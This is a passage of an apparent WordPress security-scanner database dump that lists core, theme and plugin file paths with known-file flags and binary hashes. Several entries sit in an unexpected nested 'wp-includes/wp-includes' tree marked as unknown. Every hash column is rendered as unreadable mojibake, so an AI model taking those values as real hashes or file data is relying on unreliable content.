�','wp-content/themes/sg-window/img/scrollup.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v0�a(��\Zg�@ͩ','a_nƮÉ.�֘��q�`�3�`L�\\���r|S','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('���E�&S,��$k','wp-content/themes/shootingstar/js/responsive.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�~�+�E��= ','h&� G{�ҙ��CB�{4�yF?dU�f�x�z','',0,'?'),('���3Ȉ��m�Y4���','wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('�\rK�-DR_6ĝҔ�','wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js',0,'7?�F5�sS5�7��,(','7?�F5�sS5�7��,(','J<��?Y������SuŪ�U&�\nNy�`TkL�','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('�@�_@	*^���,�|n','wp-includes/wp-includes/js/dist/shortcode.min.js',0,'j����	Q�l�*,�I�','j����	Q�l�*,�I�','�� w6R�(�K�T%ni�1��0�����[r','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s�	��.:l���','',0,'?'),('�^=��F������L','wp-includes/wp-includes/blocks/index.php',0,'���C�Dn>�u�6j\r','���C�Dn>�u�6j\r','7#�x>֜�bo�R�4#;�ۤ��|	J��','',0,'?'),('�|� (��i��/H�','wp-includes/wp-includes/js/tinymce/wp-tinymce.php',0,'1_H�0���US��@h�','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�2� �S�o-E��','����Dʹ�:&�o�n�����L���3�,E','',0,'?'),('��T������gM9ڛ','wp-includes/wp-includes/widgets.php',0,'��AĢ<ݤ9�fK:','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�7�0���,�		M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�P���\rv*ɡZ\\�','wp-includes/wp-includes/css/jquery-ui-dialog.css',0,'�b�G�-_f���kqT�','�b�G�-_f���kqT�','v�4�8p�nf��Z�H\"ռ\\�;j�R&N�','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+��	��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('��\Z凚T�L�a�','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php',0,'�dwi�+���M�U','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�q㤭�{���$I','ŁnGĂ�M\"k�7�w\"ҥ�!�I[�1','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT���	��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('����7��6�ɫ�','wp-includes/wp-includes/class-wp-object-cache.php',0,'�n̩$�������/V','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('��`�\r��鐬�Q;�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/rtl/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nܝ47���z\r��wZ�','�%�o�_O���G��Y�h�W�x�I��+Oe#c','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('��O܎$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H p3+$������','�I�E���|��Ap��ך�X�9n@��','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\'��������E�4�','z�,�g3�l[�9�v[�=\rW�\'3e�c�INڷ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('���S��D�z��','wp-includes/wp-includes/class-wp-list-util.php',0,'�}� ��Sӕvl�T@','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�\"�^\Z/\r�Or鷯�','wp-includes/wp-includes/Requests/Exception/HTTP/417.php',0,'Bpj�hO^�c\\G #','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f+ʅ�D`\0��`d->}','|�:m\"�S,�h�k���\Z8V��0d�eCe�','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P����$@A.0�Qt','@b�/E�ؔå��;M	�ۙZRİ�x����','',0,'?'),('�<�V���htج�','wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js',0,'dX�������z҆֫','dX�������z҆֫','�f��\0W{?q��������Ul�P�֫c8','',0,'?'),('�H_��_��z��W�A','wp-includes/wp-includes/class-wp-customize-panel.php',0,'��o�Vj�\'WB{.��u','��o�Vj�\'WB{.��u','�f)%�|u��8Jo�A�tD4�L�+����^','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:߼��lͨG��','',0,'?'),('�q�J+�b>�Z�<B!��','wp-includes/wp-includes/css/wp-auth-check-rtl.min.css',0,'���jv�sZ��ܻ&h�','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�~Cm���\Z��GL��9','wp-includes/wp-includes/customize/class-wp-customize-custom-css-setting.php',0,'��^Tˮ,�\"A\n�3���','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('��xT����U��M�_k','wp-content/themes/sg-window/img/icons/livejournal.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>UQM���}�n�}�','F��{���F8Y�6\r\'Aj��G�}���G�','',0,'?'),('����_.*{zQ�%�V','wp-includes/wp-includes/js/media-grid.min.js',0,'3�a\"��Å�\Z}n�K��','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('��RKQ�5v�-��	��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��b�E��y�L�J��','—9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('�¦P�W�z�z�N�','wp-includes/wp-includes/js/dist/core-data.js',0,'�+�;Q��z@�?#�_�','�+�;Q��z@�?#�_�','�2�Fsc�jp{�ѳtG��1D�Y0�Ƶ�QV�@��','',0,'?'),('���;���I)6�OH�','wp-includes/wp-includes/js/dist/format-library.min.js',0,'9���h���d6��.{�','9���h���d6��.{�','�H��? �pq+���t?��l��U��n\'�o�Q�','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T_\'!;��QYЦIk&Q','�I��Zh�y8s��Cv����rTVRḾ','',0,'?'),('��6{$o�S�����','wp-includes/wp-includes/css/customize-preview.min.css',0,'��b���Sb�s��\"','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&��9��hE�p��6�','Ǫ�s��E\'���\\l��D)i�$�����q','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0Ow�\n��<[�Q','���呂 p�oG��r�X?���,���','',0,'?'),('�; �R���V�n@F','wp-includes/wp-includes/blocks/group/block.json',0,'6qigV�+�\'�^�N�','6qigV�+�\'�^�N�','�����Bi�B�\rv�\rM5���\n9\'�d��р9�','',0,'?'),('�QlݠI���ve]r�%','wp-includes/wp-includes/js/zxcvbn.min.js',0,'|	���#PV	/{�M�_','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��87a`CZ��','hI���� x<�������%��ji�����$','',0,'?'),('��Ư	\'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T:�#}�9�H��76��','���i��O*�i������/ŝ�v�y��a��','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�N\n�V�\r�@���&�','���)%����n�Aڛ.}����x\"�}���n','',0,'?'),('��Wm�V�1��N�\"��','wp-includes/wp-includes/js/dist/dom-ready.js',0,'�5�N�M8�![��c','�5�N�M8�![��c','O\\�Ű|�~2Zce��L\"�kOM�s�g(�\Z�','',0,'?'),('��$���W	�_j�N','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',0,'���H0�c;`���W&','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('����o*nFߘ7��','wp-content/plugins/wp-cerber/assets/flags/mv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���FꠈT�[�~��','�dE4{��P�-��B������:�Þ$�{FF�','',0,'?'),('�H����޼���#�','wp-includes/wp-includes/widgets/class-wp-widget-pages.php',0,'�J�E,��ߓ%_�','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�5��$ý\n	�\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('�x>ơ?.Rvǜ��\'','wp-includes/wp-includes/js/crop/cropper.css',0,'ky5�ni*M(��','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('�ON�\"OBv_\n(}ޗ','wp-includes/wp-includes/js/hoverIntent.min.js',0,'�x�m���\n8��	�','�x�m���\n8��	�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('�(���a���b��(�','wp-content/plugins/wordfence/css/wf-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0޳�\\��5LG�','',0,'?'),('�-�l���s�j�|','wp-includes/wp-includes/js/dist/compose.min.js',0,'i\0 ��Q�a�5���?','i\0 ��Q�a�5���?','��z~�Յ\0>�����n�ۣ�3\Z؉:C�\Z�','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�Ro�N7�|','~��❃gd�&w[�u������o��|t��}','',0,'?'),('�1�cUd���/R�	','wp-content/plugins/wp-cerber/assets/flags/nu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭Y�C�����=7Ѝ�','���z��f���7?v�F�`)c�۱���s`$+','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb�	x\'P�:�����U','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��>	&���M�','',0,'?'),('�[�K� bDu �#��g','wp-includes/wp-includes/css/dist/list-reusable-blocks/style.min.css',0,'T���6JҨNM!d��$t','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,��	Ev�','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl��	��u#KV���n','',0,'?'),('�y�g��zaU\"�	XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z/P���ꮱ<	�','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('��I\\4𴒅͆?Ķ�L','wp-includes/wp-includes/blocks/file/block.json',0,'.��E��T	�P\0\\�D','.��E��T	�P\0\\�D','kr\r���.d����y%@IX���t+��Z��','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('����a�I-��c�18','wp-includes/wp-includes/js/plupload/license.txt',0,'u&\n�TI�z����+�','u&\n�TI�z����+�','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��]��u���H(','A$\Z�\Z�d��1�����/�ހ[�7�G','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('�0N4��UhH�ܨ���','wp-content/themes/shootingstar/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\nҞ!��XJ ͬS��','��s]���,�|^�\'7�l9���X7e-�#�;','',0,'?'),('�NU}��.�����b','wp-content/themes/sg-window/inc/css/one-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l���\"K���_y#��','o�IxZ�#�[���?����R���}���L�x�','',0,'?'),('�iq�s�.�,�[ebui','wp-includes/wp-includes/PHPMailer/Exception.php',0,'������ߡ�M(���','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('�q!6�����R�>����','wp-includes/wp-includes/js/jquery/ui/slider.min.js',0,'�%��ҏ��9�4g��','�%��ҏ��9�4g��','/\0�ȷ�s�d�Z�Ʈ�6����[�-\ZM ?u','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('��k��V��G�d�/��','wp-content/plugins/wp-cerber/assets/flags/th.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�Vtc��3�G�G�','��o�#�ߗ|!\\A�L=Uހ��L��q�Y�p','',0,'?'),('��(��NL�;	��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`3~L����[�()��','y�p����e�L�84G���S �E0u��','',0,'?'),('��8�qۀ]I�nS�t7','wp-includes/wp-includes/class-wp-recovery-mode-email-service.php',0,'�� ��Gu�n���Et','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('���\\E�{s�7e�','wp-content/themes/sg-window/inc/css/admin-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�\n��P�Z�\"�W�r','$�/��f�s���	^�#[F���\n����','',0,'?'),('���퇴���u��4�6','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�fk��<��\r\n��','R!�O]p�I\n��\\��VP�9�=��!�?���','',0,'?'),('�����A���V�f��','wp-content/plugins/wp-cerber/assets/flags/ug.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����h�UNJ}�','��;�T�W��m��	����(Izҁ��h2','',0,'?'),('�X�VטO|8}���','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W]��(DR{��.','Xe[	�4\0����\",����d��ځ��#�','',0,'?'),('�.�XvQa�*C��eN','wp-content/plugins/wp-cerber/assets/flags/ph.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06zD\'�w��� �','����?�ͺ�mV�yi�z2	�BC�	m�jX��','',0,'?'),('�B�H*mz��N83��','wp-admin/css/edit-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3au\r�\rt��3	�','��+y�6f��#E8+ڨC��D���؂�n��','',0,'?'),('�KӟG��o1�','wp-includes/wp-includes/css/dist/block-library/editor.min.css',0,'���;�rQ��E4��','���;�rQ��E4��','���nu�.��C�{�R���A�\r�9A/�f��','',0,'?'),('�Q��0�̭~�s�H�','wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',0,'�lo7�r79wA�U�E','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�V}�P���m�/�|I*�','wp-includes/js/customize-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�l��t:{0+7�9C�','wp-includes/sodium_compat/src/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('��.��v8-rJŕ�qQ','wp-includes/js/wp-auth-check.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j{�,��ݍ�][c','�R)C�`p��	ъ ���;(�Ltcn�zƈ��','',0,'?'),('��*�wh�|BK�5(','wp-content/themes/shootingstar/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���x�$�R���ct>','�#S\"]Ԯ/)�2������q���w% ��','',0,'?'),('��6��U�Ѧ�u�','wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�S:&\0��>f�\\�','�l�/r+���j�EQ�n��ھ�y�~Q�','',0,'?'),('������\\�O_3)��','wp-includes/wp-includes/js/jquery/ui/droppable.js',0,'/���_\na��G���','/���_\na��G���','m�U\'mU�7m�N���EFDg;�N�q��~�','',0,'?'),('��7��E#�wŧj���','wp-admin/includes/image-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LY���b �z.c�','\\�ǫ�0.��^IR�����UQ��2e@��]','',0,'?'),('�����\09= ��}a','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php',0,'M�kݢA��D�5z�yj','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('����bq�/���F�k','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7��¤\r�F��g','�n�V\'�V����V�)F|*ᑝ2�N��z','',0,'?'),('���\r����E�','wp-includes/wp-includes/kses.php',0,'��>F�ނS\0wt�R��','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('��+�B��$Hu�R�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',0,'�!K�	5y���S*','�!K�	5y���S*','���Ty�O�%u;�U�}�g�1��)��Z�','',0,'?'),('��v��|�-��','wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�<�]��r�','���p[�����L7F��|˖ZB�R�','',0,'?'),('�!HUN&�\"����z��','wp-admin/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� !�y,6��Yh���','0��Ú�1B$��Н�_@��#Xw� �p5�P','',0,'?'),('�L��~iS?�v�C>�@y','wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�i6��xu0\\����','�s�\"9���l���+���/���[�','',0,'?'),('�a�tU�q�^!�0ƣl�','wp-includes/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�%�J|,%Fś@','��6�x��q�#�\n��[j��E��9�9e�^Q','',0,'?'),('�k���zߣ����bo�R','wp-admin/post-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I\n(��ḑ���{z','�T�Ѷ�����Lc���4�O���oFd���d','',0,'?'),('�vO��#�J�N��+쁁','wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�|v�P��0�fh�T�','wp-includes/js/dist/block-directory.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ww�D�6X','���BJ���Z�<�R+���䣈d۹߶��	5','',0,'?'),('�|~�X1��S��,','wp-includes/wp-includes/images/w-logo-blue.png',0,'�[N�W��_p�w�0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('���P���Gú1j��σ','wp-includes/wp-includes/IXR/class-IXR-server.php',0,'>Y�+�=#��}9�K�','>Y�+�=#��}9�K�','X����ק�YWo�L�v�؊�n�A	C�','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('����V�h��G�!�j\'','wp-content/plugins/wp-cerber/assets/flags/jm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��F/�+�d9','\n�Ƽ�H�_���T�T�2�[�_��ox�u�','',0,'?'),('����L��6	��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('��֥��R�K�!�tt�','wp-includes/wp-includes/js/dist/priority-queue.min.js',0,'[�9(�����&!�x�','[�9(�����&!�x�','5�r�Q���b�͔5�t����>:js-O','',0,'?'),('��$4_6o �2����s','wp-includes/wp-includes/Requests/Exception/HTTP/411.php',0,'\'�R��M�.�Z`G�','\'�R��M�.�Z`G�','���U�^����9p��&���`�nM{� n�L','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('��n��ރ�z:�V0','wp-includes/wp-includes/js/tinymce/themes/inlite/theme.min.js',0,'�Z=\ro<3��E���','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('���I	2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	